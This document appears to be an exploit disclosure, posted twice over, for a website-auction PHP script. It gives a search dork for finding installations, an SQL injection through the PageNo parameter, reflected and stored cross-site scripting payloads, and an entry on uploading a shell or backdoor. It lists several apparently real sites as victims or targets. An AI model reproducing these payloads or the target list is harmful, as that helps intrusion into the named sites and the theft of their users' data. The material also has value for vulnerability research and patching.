inurl:/listing.php?category=Website
SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL]
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1
Example :
http://www.domaingang.net/listing.php?category=Website&PageNo=-1
http://www.wmmediacorp.com/sellyoursite/listing.php?category=Website&PageNo=-1
http://buyandsellwebsite.org/listing.php?category=Website&PageNo=-1
http://www.santinet.net/offers/listing.php?category=Website&PageNo=-1
http://nomclub.com/listing.php?category=Website&PageNo=-1
http://websiterama.com/listing.php?category=Website&PageNo=-1
http://www.flipitmarketplace.com/listing.php?category=Website&PageNo=-1
XSS (Non Persistent)
Example : http://buyandsellwebsite.org/admin/
PIC : http://i50.tinypic.com/i20own.png
Example : http://buyandsellwebsite.org/listing.php?category=<script>alert(/x-cisadane/)</script>
PIC : http://i46.tinypic.com/dwqip0.png
XSS (Persistent)
*Must be logged in
http://victim site/<path>/sell-your-site.php
Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php
PIC : http://i49.tinypic.com/20qz0x1.png
Upload Shell/Backdoor :
Example (Victim/Target) : http://websiterama.com/
Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss…!
awauction.txt
inurl:/listing.php?category=Website
SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL]
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1
Example :
http://www.domaingang.net/listing.php?category=Website&PageNo=-1
http://www.wmmediacorp.com/sellyoursite/listing.php?category=Website&PageNo=-1
http://buyandsellwebsite.org/listing.php?category=Website&PageNo=-1
http://www.santinet.net/offers/listing.php?category=Website&PageNo=-1
http://nomclub.com/listing.php?category=Website&PageNo=-1
http://websiterama.com/listing.php?category=Website&PageNo=-1
http://www.flipitmarketplace.com/listing.php?category=Website&PageNo=-1
XSS (Non Persistent)
Example : http://buyandsellwebsite.org/admin/
PIC : http://i50.tinypic.com/i20own.png
Example : http://buyandsellwebsite.org/listing.php?category=<script>alert(/x-cisadane/)</script>
PIC : http://i46.tinypic.com/dwqip0.png
XSS (Persistent)
*Must be logged in
http://victim site/<path>/sell-your-site.php
Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php
PIC : http://i49.tinypic.com/20qz0x1.png
Upload Shell/Backdoor :
Example (Victim/Target) : http://websiterama.com/